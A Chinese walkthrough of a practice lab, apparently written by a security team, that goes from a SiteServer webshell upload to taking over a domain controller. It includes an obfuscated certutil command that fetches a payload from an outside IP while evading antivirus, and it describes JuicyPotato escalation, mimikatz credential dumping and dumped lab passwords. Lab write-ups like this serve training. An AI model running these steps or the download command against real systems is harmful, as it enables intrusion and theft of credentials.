从web端getshell到内网域控

科技

2022-07-11 09:07

先说结论

这套环境刚开始大体看了下以为比较有难度，没想到拿下域内OA办公机时直接把域管密码dump下来了，感觉属实草率了。。。不过整体来说还是可以的，对于在实战中遇到域控不多的铁子可以拿来练练手熟悉环境，最后感谢作者提供的靶场环境，大佬辛苦了！

信息收集

已知靶标URL为http://www.moonlab.com/
（搭建环境访问时需要绑定hosts），直接访问域名没啥东西

查看robots.txt

siteserver管理员密码找回

siteserver之前爆出过管理员密码找回功能存在缺陷，详情见此
使用密码找回功能
http://www.moonlab.com/siteserver/forgetPassword.aspx

火狐禁用JS，Firefox地址栏

about:config

搜索框中输入JavaScript，找到javascript.enabled将其转换为false

回到找回密码页面，一直点下一步

后台getshell

siteserver后台getshell方法很多，详情
这里使用模板文件上传拿shell。
在’系统管理’–’站点模版管理’–’导入站点模版’，

使用csroad大佬的webshell免杀生成器生成ashx CMD马，压缩为rar上传到目标模版里，然后访问即可获取webshell

tasklist可以看到有安全狗

上线cs,本机信息收集，搭代理

使用免杀语句将cs木马下载到靶机

c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://23.234.209.205:8000/6666.exe 6666.exe

查看权限，梼杌插件JuicyPotato (ms16-075)提权至system

查看是否开启3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnectionsshell tasklist /svc | findstr "TermService"shell netstat -ano | findstr "992"

双网卡机器

读管理员密码 administrator !@#QWE123

上frp搭代理(已经读出管理员密码，确认开启3389，故忽略此步骤接下来直接在虚拟机内靶机上操作，否则太卡。。。)

shell frpc.exe -c socks5.ini

内网横向

fscan探测内网信息，发现1.130机器存在通达OA

直接梭哈拿shell

system权限带360、不出网，双网卡存在10.10.10.段，2012操作系统

正向连接上线CS，首先生成监听器beacon-tcp，监听在17775端口

然后CS生成一个stageless木马，选定刚才的新监听器

connect 10.10.1.130 17775

可以看到是域内机器，而且有域控进程

mimikatzs抓取logonpasswords
获取本机administrator密码!@#Q123，域内用户OA密码!@#Qz123，域控administrator密码tide123…

域控

定位域控IP10.10.10.165

nmap扫全端口，3389已开

直接远程桌面登录

flag.txt

关

于

我

们

Tide安全团队正式成立于2019年1月，是新潮信息旗下以互联网攻防技术研究为目标的安全团队，团队致力于分享高质量原创文章、开源安全工具、交流安全技术，研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室，近三年来在网络安全技术方面开展研发项目60余项，获得各类自主知识产权30余项，省市级科技项目立项20余项，研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。

来源: qq

点击查看作者最近其他文章